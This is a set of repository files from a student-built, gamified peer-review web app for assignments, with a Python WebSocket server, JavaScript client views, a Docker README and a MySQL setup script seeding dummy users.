assignment[\"status\"] = status\n self.database_manager.replace_into_table(\"Assignments\", assignment)\n except:\n pass\n\n return update_clients\n\n\n\n def reviewer_assigning(self, assignment):\n submissions = self.assignments_manager.get_submissions_for_assignment(assignment[\"id\"])\n\n submitters = []\n for submission in submissions:\n submitters.append(submission[\"user_id\"])\n\n total_reviews_to_do = assignment[\"reviewers_amount\"]\n if total_reviews_to_do >= len(submitters):\n total_reviews_to_do = len(submitters) - 1\n #SEND EMAIL\n\n reviewer_ids = []\n for submission in submissions:\n reviewer_ids.append( [ ] )\n\n\n max_clock_offset = len(submissions) - 1\n offset = 1\n\n\n for i in range(0, total_reviews_to_do):\n for j in range(0, len(reviewer_ids)):\n reviewer_ids[j].append(submitters[offset])\n offset += 1\n if offset > max_clock_offset:\n offset = 0\n offset += 1\n if offset > max_clock_offset:\n offset = 0\n\n for i in range(0, len(submissions)):\n submissions[i][\"reviewers_ids\"] = reviewer_ids[i]\n del submissions[i][\"user_data\"]\n\n try:\n self.assignments_manager.submit_assignment(submissions[i])\n #print(\"Updated Submission\")\n except:\n pass\n\n\n\ncheck_time = CheckAssignmentStage()\n\ndef update():\n return check_time.update()\n"
},
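`reviewer_assigning` above is a round-robin scheme: walking clockwise around the list of submitters, each submission receives the next few submitters as reviewers, and nobody reviews their own work. The same idea in a compact JavaScript sketch (illustrative only; the server-side version is the Python above):

```javascript
// Round-robin reviewer assignment: give each submission `reviewsWanted`
// reviewers, capped at n-1 so nobody can be assigned to their own work.
function assignReviewers(submitterIds, reviewsWanted) {
    var n = submitterIds.length;
    var perSubmission = Math.min(reviewsWanted, n - 1);
    return submitterIds.map(function (ownerId, i) {
        var reviewers = [];
        for (var k = 1; k <= perSubmission; k++) {
            reviewers.push(submitterIds[(i + k) % n]); // next k-th submitter around the clock
        }
        return { owner: ownerId, reviewers: reviewers };
    });
}

// assignReviewers([2, 3, 4, 5], 2)
// -> [{owner: 2, reviewers: [3, 4]}, {owner: 3, reviewers: [4, 5]}, ...]
```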
{
"alpha_fraction": 0.5866551399230957,
"alphanum_fraction": 0.5875216722488403,
"avg_line_length": 15.485713958740234,
"blob_id": "78325e0aa894bf685cd126305879ecfc5afb1f9b",
"content_id": "a0c20308f03088bf8a4e7cfa54f586942faaa01c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1154,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 70,
"path": "/js/Net.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "///**class Net**/\nclass Net\n{\n\tconstructor()\n\t{\n\t\tthis.host = \"\";\n\t\tthis.port = \"\";\n\t\tthis.messageHandler = new MessageHandler();\n\t}\n\n\tsetHost (ip, port)\n\t{\n\t\tthis.host = ip;\n\t\tthis.port = port;\n\t}\n\n\tconnect ()\n\t{\n\t\tvar that = this;\n\t\tthis.ws = new WebSocket(\"ws://\"+this.host+\":\"+this.port+\"/GCodeReviewer\");\n\n\t\tthis.ws.onopen = function()\n\t\t{\n\n\t\t};\n\n\t\tthis.ws.onmessage = function (evt)\n\t\t{\n\t\t \tthat.messageHandler.handleMessage(evt.data);\n\t\t};\n\n\t\tthis.ws.onclose = function()\n\t\t{\n\t\t\tconsole.log(\"ws closed\");\n\t\t};\n\t}\n\n\tsendMessage (type, data)\n\t{\n\t\tconsole.log(\"in net.js\");\n\t\tconsole.log(type, data);\n\t\tvar msg = {};\n\t\tmsg.data = data;\n\t\tmsg.type = type;\n\n\t\tvar m = JSON.stringify(msg);\n\t\tconsole.log(m);\n\t\tm = JSON.parse(m);\n\t\tconsole.log(m);\n\t\tthis.ws.send(JSON.stringify(msg));\n\t}\n\n\t/**this method is mostly used to talk with the server.**/\n\tXHR (type, url, callback, params)\n\t{\n\t\tvar xhr = new XMLHttpRequest();\n\t\txhr.onreadystatechange = function()\n\t\t{\n\t\t if (xhr.readyState === 4)\n\t\t\t{\n\t\t \tcallback(xhr.responseText);\n\t\t }\n\t\t};\n\t\txhr.open(type, url, true);\n\t\tif(params === undefined){\n\t\t\tparams = null;\n\t\t}\n\t\txhr.send(params);\n\t};\n}\n"
},
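Startup wiring is then a sketch like this (host and port are illustrative; the `/GCodeReviewer` endpoint path comes from `connect()` itself):

```javascript
var net = new Net();
net.setHost("localhost", 8080); // illustrative host/port
net.connect();                  // opens ws://localhost:8080/GCodeReviewer

// In practice, send only once the socket has opened:
net.ws.onopen = function () {
    net.sendMessage("get_assignments", {}); // envelope: {"type": ..., "data": ...}
};
```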
{
"alpha_fraction": 0.5261239409446716,
"alphanum_fraction": 0.5281490683555603,
"avg_line_length": 26.433332443237305,
"blob_id": "c0359652e93d535ae792c9c5602faf79d0c86dc0",
"content_id": "e3381f4f9a37d69d783e4e43fca0c427e43fb634",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2469,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 90,
"path": "/js/Assignments.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Assignments extends Model\n{\n constructor()\n {\n super();\n this.assignments = [];\n }\n\n\n update(data, messageType)\n {\n if (data !== \"\" && !Number.isInteger(data))\n {\n if ( messageType === net.messageHandler.types.TEACHER_ASSIGNMENTS_CREATION_SUCCESSFUL ||\n messageType === net.messageHandler.types.GET_ASSIGNMENTS_SUCCESSFUL ||\n messageType === net.messageHandler.types.ASSIGNMENT_DELETE_SUCCESSFUL)\n {\n this.assignments = [];\n for (var i = 0; i < data.length; i++)\n {\n this.assignments.push( new Assignment(data[i]));\n }\n }\n }\n\n // updates views\n this.notify(messageType);\n }\n\n createAssignment(name, deadlineTime, deadlineDate,reviewTillTime, reviewTillDate, description, reviewersAmount)\n {\n var data = {};\n data.name = name;\n data.deadline_time = deadlineTime;\n data.deadline_date = deadlineDate;\n data.description = description;\n data.review_till_date = reviewTillDate;\n data.review_till_time = reviewTillTime;\n data.reviewers_amount = reviewersAmount;\n data.status = \"normal\";\n\n\n net.sendMessage(\"add_assignment\", data);\n }\n\n getAllAssignment()\n {\n net.sendMessage(\"get_assignments\", {});\n }\n\n deleteAssignment(id)\n {\n net.sendMessage(\"delete_assignment\", {\"id\":id});\n }\n\n submitAssignment(assignmentID, filesSubmitted)\n {\n var data = app.submissions.getIfSubmitted( assignmentID, app.user.id);\n\n if (Object.keys(data).length === 0)\n {\n data.user_id = app.user.id;\n data.assignment_id = assignmentID;\n data.submission_data = filesSubmitted;\n data.is_complete = 0;\n\n data.iteration = 1;\n data.reviewers_ids = [];\n data.feedbacks = [];\n }\n\n else\n {\n for (var i = 0; i < this.assignments.length; i++)\n {\n if (this.assignments[i].id === assignmentID && (this.assignments[i].status === \"review\" || this.assignments[i].status === \"review_end_soon\" ))\n {\n data.iteration++;\n }\n\n }\n\n\n data.submission_data = filesSubmitted;\n }\n\n\n net.sendMessage(\"submit_assignment\", data);\n }\n}\n"
},
{
"alpha_fraction": 0.6816245317459106,
"alphanum_fraction": 0.683470606803894,
"avg_line_length": 23.36678123474121,
"blob_id": "a3198176006055d5f4b4f325d2e9cf713219d34a",
"content_id": "fd80245ab4d6e11972e10ff65c8012da4ff122de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7045,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 289,
"path": "/py/assignments_manager.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "from database_manager import DatabaseManager\nfrom email_system import EmailSystem\nfrom bs4 import BeautifulSoup\nimport requests\nimport random\nimport json\n\n\n\nclass AssignmentsManager:\n\tdef __init__(self):\n\t\tprint(\"AssignmentsManager: __init__\")\n\t\tself.database_manager = DatabaseManager()\n\t\tself.email_system = EmailSystem()\n\n\n\tdef add_assignment(self, message_data):\n\t\tprint(\"add_assignment\")\n\t\ttype = \"teacher_assignments_creation_successful\"\n\t\tdata = {}\n\n\t\ttry:\n\t\t\tpass\n\t\t\tself.database_manager.insert_into_table(\"Assignments\", message_data)\n\t\t\tprint(\"Added Assignment Successfully\")\n\t\texcept:\n\t\t\ttype = \"teacher_assignments_creation_failed\"\n\t\t\tprint(\"Added Assignment Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\tdef delete_assignment(self, id):\n\t\ttype = \"assignment_delete_successful\"\n\t\tdata = {}\n\n\t\ttry:\n\t\t\tpass\n\t\t\tself.database_manager.delete_assignment(id)\n\t\t\tprint(\"Deleted Assignment Successfully\")\n\t\texcept:\n\t\t\ttype = \"assignment_delete_failed\"\n\t\t\tprint(\"Deleted Assignment Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\n\tdef get_assignments(self):\n\t\tprint(\"get_assignment\")\n\t\ttype = \"get_assignments_successful\"\n\t\tdata = {}\n\n\t\ttry:\n\t\t\tdata = self.database_manager.select_all_from_table(\"Assignments\")\n\t\t\tprint(\"Retrieved Assignments Successfully\")\n\t\texcept:\n\t\t\ttype = \"get_assignments_failed\"\n\t\t\tprint(\"Added Assignment Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\n\tdef submit_assignment(self, message_data):\n\t\tprint(\"submit_assignment\")\n\t\ttype = \"submit_assignment_successful\"\n\t\tdata = []\n\n\t\ttry:\n\n\t\t\tsubmission_data = json.dumps(message_data[\"submission_data\"])\n\t\t\tmessage_data[\"submission_data\"] = submission_data\n\n\t\t\treviewers_ids = json.dumps(message_data[\"reviewers_ids\"])\n\t\t\tmessage_data[\"reviewers_ids\"] = reviewers_ids\n\n\t\t\tfeedbacks = json.dumps(message_data[\"feedbacks\"])\n\t\t\tmessage_data[\"feedbacks\"] = feedbacks\n\n\t\t\tself.database_manager.replace_into_table(\"Submissions\", message_data)\n\t\t\tprint(\"Submitted Assignment Successfully\")\n\n\t\texcept:\n\t\t\ttype = \"submit_assignment_failed\"\n\t\t\tprint(\"Submitted Assignment Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\tdef get_submissions(self, user_id):\n\t\tprint(\"get_submissions\")\n\t\ttype = \"get_submissions_successful\"\n\t\tdata = []\n\n\t\t#try:\n\t\tsubmissions = self.database_manager.select_all_from_table(\"Submissions\")\n\t\tusers = self.database_manager.select_all_from_table(\"Users\")\n\n\t\t# these include a.Personal submissions and b.Submission to review.\n\t\tactual_submissions = []\n\n\t\tfor submission in submissions:\n\n\t\t\t#if it is our submission - we grab it\n\t\t\tif submission[\"user_id\"] == user_id:\n\t\t\t\tactual_submissions.append(submission)\n\n\t\t\tsubmission_data = json.loads(submission[\"submission_data\"])\n\t\t\tsubmission[\"submission_data\"] = submission_data\n\n\t\t\treviewers_ids = json.loads(submission[\"reviewers_ids\"])\n\n\t\t\tif len(reviewers_ids) > 0:\n\t\t\t\tfor i in range(0, len(reviewers_ids)):\n\t\t\t\t\tfor user in users:\n\t\t\t\t\t\tif user[\"id\"] == reviewers_ids[i]:\n\t\t\t\t\t\t\treviewers_ids[i] = user\n\n\t\t\t\t\t# if user requesting submissions is mentioned as a reviewer - we grab the submission\n\t\t\t\t\tif reviewers_ids[i][\"id\"] == 
user_id:\n\t\t\t\t\t\tactual_submissions.append(submission)\n\n\n\t\t\tsubmission[\"reviewers_ids\"] = reviewers_ids\n\n\t\t\tfeedbacks = json.loads(submission[\"feedbacks\"])\n\t\t\tsubmission[\"feedbacks\"] = feedbacks\n\n\n\n\n\t\tdata = actual_submissions\n\n\t\tprint(\"Get Submissions Successfully\")\n\t\t#except:\n\t\t#\ttype = \"get_submissions_failed\"\n\t\t#\tprint(\"Get Submissions Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\tdef get_all_submissions(self):\n\t\tprint(\"get_all_submissions\")\n\t\ttype = \"get_submissions_successful\"\n\t\tdata = []\n\n\t\ttry:\n\t\t\tsubmissions = self.database_manager.select_all_from_table(\"Submissions\")\n\t\t\tusers = self.database_manager.select_all_from_table(\"Users\")\n\n\t\t\tfor submission in submissions:\n\t\t\t\tsubmission_data = json.loads(submission[\"submission_data\"])\n\t\t\t\tsubmission[\"submission_data\"] = submission_data\n\n\t\t\t\treviewers_ids = json.loads(submission[\"reviewers_ids\"])\n\n\t\t\t\tif len(reviewers_ids) > 0:\n\t\t\t\t\tfor i in range(0, len(reviewers_ids)):\n\t\t\t\t\t\tfor user in users:\n\t\t\t\t\t\t\tif user[\"id\"] == reviewers_ids[i]:\n\t\t\t\t\t\t\t\treviewers_ids[i] = user\n\t\t\t\tsubmission[\"reviewers_ids\"] = reviewers_ids\n\n\n\t\t\t\tfeedbacks = json.loads(submission[\"feedbacks\"])\n\t\t\t\tsubmission[\"feedbacks\"] = feedbacks\n\n\n\n\t\t\t\tfor user in users:\n\t\t\t\t\tif user[\"id\"] == submission[\"user_id\"]:\n\t\t\t\t\t\tsubmission[\"user_data\"] = user\n\n\t\t\tdata = submissions\n\n\t\t\tprint(\"Get All Submissions Successfully\")\n\t\texcept:\n\t\t\ttype = \"get_submissions_failed\"\n\t\t\tprint(\"Get all Submissions Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\n\n\tdef get_submissions_for_assignment(self,assignment_id):\n\t\tall_submissions = self.get_all_submissions()[1]\n\t\tsubmissions = []\n\t\tfor submission in all_submissions:\n\t\t\tif submission[\"assignment_id\"] == assignment_id:\n\t\t\t\tsubmissions.append(submission)\n\n\t\treturn submissions\n\n\n\n\tdef submit_review(self, message_data):\n\t\tprint(\"submit_review\")\n\t\ttype = \"submit_review_successful\"\n\n\t\tnew_review = message_data[\"new_review\"]\n\t\tdel message_data[\"new_review\"]\n\n\t\tdata = []\n\n\t\ttry:\n\t\t\tif new_review:\n\t\t\t\tself.database_manager.add_review(message_data)\n\t\t\t\tprint(\"Submitted New Review Successfully\")\n\t\t\telse:\n\t\t\t\tself.database_manager.update_review(message_data)\n\t\t\t\tprint(\"Submitted Updated Review Successfully\")\n\n\t\texcept:\n\t\t\ttype = \"submit_review_failed\"\n\t\t\tprint(\"Submit Review Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n\n\n\tdef push_standard(self, message_data):\n\t\tprint(\"push_standard\")\n\t\ttype = \"submit_review_successful\"\n\t\tdata = {}\n\n\t\tskip_title_h1 = True\n\n\t\thtml_content = message_data[\"html_content\"]\n\t\tsoup = BeautifulSoup(html_content, 'html.parser')\n\t\tnode_list = soup.find_all([\"h1\", \"h2\"])\n\n\t\tstandards = []\n\t\tstandard_bit = {}\n\n\t\tfor n in node_list:\n\t\t\tif n.get_text() == \"\":\n\t\t\t\tcontinue\n\n\t\t\tif n.name == \"h1\":\n\t\t\t\tif skip_title_h1:\n\t\t\t\t\tskip_title_h1 = False\n\t\t\t\t\tcontinue\n\t\t\t\tstandard_bit[\"category\"] = n.get_text().rstrip()\n\n\t\t\tif n.name == \"h2\":\n\t\t\t\tstandard_bit[\"sub_category\"] = n.get_text().rstrip()\n\t\t\t\tstandard_bit[\"description\"] = \"\"\n\t\t\t\tfor elem in n.next_siblings:\n\t\t\t\t\tif elem.name == 'p':\n\t\t\t\t\t\tif elem.get_text() != 
\"\":\n\t\t\t\t\t\t\tdescription = elem.get_text()\n\t\t\t\t\t\t\tdescription.replace(\"┬а\", \" \")\n\t\t\t\t\t\t\tstandard_bit[\"description\"] += description + \"<br>\"\n\n\t\t\t\t\tif elem.name and elem.name.startswith('h'):\n\t\t\t\t\t\tcategory = standard_bit[\"category\"]\n\t\t\t\t\t\tstandards.append(standard_bit)\n\t\t\t\t\t\tstandard_bit = {\"category\":category}\n\t\t\t\t\t\tbreak\n\n\t\ttry:\n\t\t\tfor standard in standards:\n\t\t\t\tself.database_manager.replace_into_table(\"Standards\", standard)\n\t\t\tprint(\"Submitted Standard Successfully\")\n\n\n\t\texcept:\n\t\t\ttype = \"submit_review_failed\"\n\t\t\tpass\n\n\t\tmessage = [type, standards]\n\t\treturn message\n\n\tdef get_standard(self):\n\t\tprint(\"get_standard\")\n\t\ttype = \"get_standard_successful\"\n\t\tdata = []\n\n\t\ttry:\n\t\t\tdata = self.database_manager.select_all_from_table(\"Standards\")\n\t\t\tprint(\"Get All Standards Successfully\")\n\t\texcept:\n\t\t\ttype = \"get_standard_failed\"\n\t\t\tprint(\"Get All Standards Failed\")\n\n\t\tmessage = [type, data]\n\t\treturn message\n"
},
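`push_standard` walks exported HTML: each `h1` opens a category and each `h2` a sub-category whose description is the run of `p` tags up to the next heading. A browser-side sketch of the same traversal (illustrative only; the server uses BeautifulSoup as above, and additionally skips the document's title `h1`):

```javascript
// Illustrative client-side equivalent of push_standard's heading walk.
function parseStandards(htmlContent) {
    var doc = new DOMParser().parseFromString(htmlContent, "text/html");
    var standards = [];
    var category = "";
    doc.body.querySelectorAll("h1, h2").forEach(function (node) {
        if (node.tagName === "H1") {
            category = node.textContent.trim();
            return;
        }
        // Collect the <p> siblings between this h2 and the next heading.
        var description = "";
        for (var el = node.nextElementSibling;
             el && !/^H[1-6]$/.test(el.tagName);
             el = el.nextElementSibling) {
            if (el.tagName === "P" && el.textContent !== "") {
                description += el.textContent + "<br>";
            }
        }
        standards.push({
            category: category,
            sub_category: node.textContent.trim(),
            description: description
        });
    });
    return standards;
}
```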
{
"alpha_fraction": 0.648876428604126,
"alphanum_fraction": 0.658707857131958,
"avg_line_length": 24.657657623291016,
"blob_id": "9756b3a46ca099b0d5094bca87f1112fe4ce5496",
"content_id": "ef163dcc34622f7b846485be2cb36e6806a5c622",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2848,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 111,
"path": "/views/assignments-teacher/AssignmentsTeacherView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass AssignmentsTeacherView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.ASSIGNMENTS_TEACHER;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\t\tvar view = this;\n\n\t\t// Update the table of assessments\n\t\tif (messageType === net.messageHandler.types.TEACHER_ASSIGNMENTS_CREATION_SUCCESSFUL ||\n\t\t\tmessageType === net.messageHandler.types.GET_ASSIGNMENTS_SUCCESSFUL ||\n\t\t\tmessageType === net.messageHandler.types.ASSIGNMENT_DELETE_SUCCESSFUL )\n\t\t{\n\t\t\tvar assignmentTable = document.getElementById(\"teacher-assignments-table\");\n\n\t\t\t// remove all data in there.\n\t\t\tvar rowCount = assignmentTable.rows.length;\n\t\t\twhile(--rowCount)\n\t\t\t{\n\t\t\t\tassignmentTable.deleteRow(rowCount);\n\t\t\t}\n\n\t\t\tvar assignments = model.assignments;\n\n\t\t\tfor (var i = 0; i < assignments.length; i++)\n\t\t\t{\n\t\t\t\tvar row = assignmentTable.insertRow(i + 1);\n\n\n\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\tvar cell1 = row.insertCell(1);\n\t\t\t\tvar cell2 = row.insertCell(2);\n\t\t\t\tvar cell3 = row.insertCell(3);\n\t\t\t\tvar cell4 = row.insertCell(4);\n\t\t\t\tvar cell5 = row.insertCell(5);\n\n\n\t\t\t\tvar img = document.createElement(\"IMG\");\n\t\t\t\timg.src = \"resources/images/trash-button.png\";\n\t\t\t\timg.id = \"delete-assignment-button##\" + assignments[i].id;\n\t\t\t\timg.className = \"picture-button\";\n\t\t\t\timg.addEventListener(\"click\", function()\n\t\t\t\t{\n\t\t\t\t\tvar id = parseInt(this.id.split('##')[1]);\n\t\t\t\t\tview.controller.deleteAssignment(id);\n\t\t\t\t});\n\t\t\t\tcell0.appendChild(img);\n\n\n\t\t\t\tcell1.innerHTML = assignments[i].name;\n\t\t\t\tcell2.innerHTML = assignments[i].description;\n\t\t\t\tcell3.innerHTML = assignments[i].reviewTillDate;\n\t\t\t\tcell4.innerHTML = assignments[i].reviewTillTime;\n\n\t\t\t\tvar status = assignments[i].status;\n\n\t\t\t\tif (status === \"normal\") {\n\t\t\t\t\tstatus = \"Normal\";\n\t\t\t\t}\n\t\t\t\telse if (status === \"submission_soon\") {\n\t\t\t\t\tstatus = \"Submissions Due Soon\";\n\t\t\t\t}\n\t\t\t\telse if (status === \"review\") {\n\t\t\t\t\tstatus = \"Review Time\";\n\t\t\t\t}\n\t\t\t\telse if (status === \"review_end_soon\") {\n\t\t\t\t\tstatus = \"Reviewing Ends Soon\";\n\t\t\t\t}\n\t\t\t\telse if (status === \"completed\") {\n\t\t\t\t\tstatus = \"Completed\";\n\t\t\t\t}\n\n\n\n\t\t\t\tcell5.innerHTML = status;\n\t\t\t}\n\n\t\t\t// Add one more, where you can add a new assignment\n\t\t\tvar emptyRow = assignmentTable.insertRow(assignments.length + 1);\n\t\t\tvar iconCell = emptyRow.insertCell(0);\n\t\t\temptyRow.insertCell(1);\n\t\t\temptyRow.insertCell(2);\n\t\t\temptyRow.insertCell(3);\n\t\t\temptyRow.insertCell(4);\n\t\t\temptyRow.insertCell(5);\n\n\t\t\tvar img = document.createElement(\"IMG\");\n\t\t\timg.src = \"resources/images/plus-button.png\";\n\t\t\timg.id = \"add-assignment-button\";\n\t\t\timg.className = \"picture-button\";\n\t\t\timg.addEventListener(\"click\", function()\n\t\t\t{\n\t\t\t\tview.controller.createAddAssignmentModal();\n\t\t\t});\n\t\t\ticonCell.appendChild(img);\n\t\t}\n\t}\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n}\n"
},
{
"alpha_fraction": 0.7206266522407532,
"alphanum_fraction": 0.7223672866821289,
"avg_line_length": 20.679244995117188,
"blob_id": "b074376652054756450e9e5bf5f1bc6dfa8b91cd",
"content_id": "32363e8c4583a066514819f046178dc2e213f968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1149,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 53,
"path": "/README.md",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "This is a gamified verison of Mihass Project a.k.a Ankylo\n\nIt uses Docker to provide portability, so you do not need to have MySQL or Python to start it up. First you need to build a Python Server from the root folder:\n\n$ docker build -t python-server -f Docker/ServerDockerfile .\n\nTo deploy and launch this project, run following commands.\n\n$ cd Docker\n$ docker-compose build\n$ docker-compose up\n\nThen go to http://localhost/gs/ (if you use Docker for Windows/MacOS) or an IP stated when you start docker-toolbox.\n\nTo stop docker:\n\n# cd Docker\n# docker-compose stop\n\n\nFeatures Completed:\n-Signin\n-Signup\n\n\nTo Do:\n-Navigation Bar***\n-Submit Assignment\n -Selector***\n -Submission Window (1)***\n-Submit Review\n -Select Mode*\n -Review Mode (3 + spike)***\n\n-Read Feedback**\n-Review Selector**\n-Space Game*\n-View Review**\n-Profile\n -Skill Window\n -Statistics\n\n\n-Teacher System side\n -Add New Standards**\n -Add/Modify Assignment**\n -Review Assignment*\n\n- Sample code\n//Create a modal\nvar modalData = app.uiFactory.createModal(\"id\", \"title\");\ndocument.body.appendChild(modalData.modal);\nmodalData.modal.style.display = \"block\";\n"
},
{
"alpha_fraction": 0.6665172576904297,
"alphanum_fraction": 0.6844464540481567,
"avg_line_length": 33.32307815551758,
"blob_id": "ddf7360dff3fb04db514732cf28147fe4c137a0e",
"content_id": "550a6f543b424568413b341c9a23f21d2bf1a46f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2231,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 65,
"path": "/Docker/MySQL/setup.sql",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "CREATE DATABASE IF NOT EXISTS ProjectOrganiser;\nUSE ProjectOrganiser;\n\n-- Table `ProjectOrganiser`.`Users`\nCREATE TABLE IF NOT EXISTS `ProjectOrganiser`.`Users` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `email` VARCHAR(255) NOT NULL,\n `name` VARCHAR(45) NOT NULL,\n `surname` VARCHAR(45) NOT NULL,\n `team_name` VARCHAR(45) NOT NULL,\n `noun` VARCHAR(45) NOT NULL,\n `password` VARCHAR(32) NOT NULL,\n `role` VARCHAR(32) NOT NULL,\n `logs` MEDIUMTEXT,\n PRIMARY KEY (`id`));\n\nCREATE UNIQUE INDEX `email_UNIQUE` ON `ProjectOrganiser`.`Users` (`email` ASC);\n\n-- creating dummy teacher\n\nINSERT INTO ProjectOrganiser.Users (email, team_name, name, surname, noun, password, role)\nVALUES ('q','teacher','John','Doe','Potato','q','teacher'),\n ('w','1','w','w','Bed','w','student'),\n ('e','1','e','e','Chair','e','student'),\n ('r','2','r','r','Pizza','r','student'),\n ('t','2','t','t','Grass','t','student');\n\n\n-- Table `ProjectOrganiser`.`Assignments`\nCREATE TABLE IF NOT EXISTS `ProjectOrganiser`.`Assignments` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `name` VARCHAR(63) NOT NULL,\n `deadline_date` VARCHAR(16) NOT NULL,\n `deadline_time` VARCHAR(16) NOT NULL,\n `review_till_date` VARCHAR(16) NOT NULL,\n `review_till_time` VARCHAR(16) NOT NULL,\n `reviewers_amount` INT NOT NULL,\n `status` VARCHAR(32) NOT NULL,\n `description` VARCHAR(255) NOT NULL,\n\n PRIMARY KEY (`id`));\n\nCREATE UNIQUE INDEX `deadline_date_UNIQUE` ON `ProjectOrganiser`.`Assignments` (`name` ASC);\n\n-- Table `ProjectOrganiser`.`Submissions`\nCREATE TABLE IF NOT EXISTS `ProjectOrganiser`.`Submissions` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `user_id` INT NOT NULL,\n `assignment_id` INT NOT NULL,\n `submission_data` MEDIUMTEXT NOT NULL,\n `is_complete` INT NOT NULL,\n `iteration` INT NOT NULL,\n `reviewers_ids` MEDIUMTEXT,\n `feedbacks` MEDIUMTEXT,\n PRIMARY KEY (`id`, `user_id`, `assignment_id`));\n\n-- Table `ProjectOrganiser`.`Standards`\nCREATE TABLE IF NOT EXISTS `ProjectOrganiser`.`Standards` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `category` VARCHAR(255),\n `sub_category` VARCHAR(255),\n `description` MEDIUMTEXT,\n PRIMARY KEY (`id`));\n\nCREATE UNIQUE INDEX `deadline_date_UNIQUE` ON `ProjectOrganiser`.`Standards` (`category`, `sub_category` ASC);\n"
},
{
"alpha_fraction": 0.6402713060379028,
"alphanum_fraction": 0.6441206336021423,
"avg_line_length": 24.02522850036621,
"blob_id": "6a5dc2a2c80fe5f53a3ad0046abefd2368c5baed",
"content_id": "eaac1c6e886d7c9487645dc6a06baefafc5cd328",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 10911,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 436,
"path": "/views/feedback/FeedbackView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass FeedbackView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.FEEDBACK;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\n\t\tthis.spaceShipLives = 3; // How many lives ship has. Each issue takes one live.\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\t\tvar view = this;\n\n\t\t// Update the table of assignments\n\t\tif (messageType === net.messageHandler.types.GET_SUBMISSIONS_SUCCESSFUL)\n\t\t{\n var submissionsTable = document.getElementById(\"student-assignment-feedback-table\");\n\n // remove all data in there.\n var rowCount = submissionsTable.rows.length;\n while (--rowCount) {\n submissionsTable.deleteRow(rowCount);\n }\n\n var assignments = app.assignments.assignments;\n\t\t\tvar submissions = model.submissions;\n\t\t\tvar subIns = [];\n\t\t\tfor (var i = 0; i < submissions.length; i++)\n\t\t\t{\n\t\t\t\t// if he is an owner - then he is the one to see these.\n\t\t\t\tif (submissions[i].userID === app.user.id)\n\t\t\t\t{\n\t\t\t\t\tvar submission = submissions[i];\n\t\t\t\t\tvar currentFeedbacksIDs = [];\n\n\t\t\t\t\tfor (var k = 0;k < submission.feedbacks.length; k++)\n\t\t\t\t\t{\n\t\t\t\t\t\tif (submission.feedbacks[k].iteration_submitted === submission.iteration)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tsubIns.push(i);\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\n\t\t\tvar rowIndex = 0;\n for (var i = 0; i < subIns.length; i++)\n {\n \tif (submissions[subIns[i]].feedbacks.length !== 0)\n \t{\n\t\t\t\t\tvar row = submissionsTable.insertRow(rowIndex + 1);\n\n\t\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\t\tfor (var j = 0; j < assignments.length; j++)\n\t\t\t\t\t{\n\t\t\t\t\t\tif (submissions[subIns[i]].assignmentID === assignments[j].id)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tcell0.innerHTML = assignments[j].name;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tcell0.id = \"see-student-assignment-feedback#\" + subIns[i];\n\t\t\t\t\tcell0.addEventListener(\"click\", function ()\n\t\t\t\t\t{\n\t\t\t\t\t\tview.createReviewSelectModal(parseInt(this.id.split(\"#\")[1]), this.innerHTML);\n\t\t\t\t\t});\n\t\t\t\t\trowIndex++;\n\t\t\t\t}\n }\n }\n\t}\n\n\tcreateReviewSelectModal(subIndex, assignmentName)\n\t{\n\t\tvar that = this;\n\n\t\tvar modalBody = app.modalContentManager.getModalContent(\"select-review-student\");\n\t\tvar modalData = 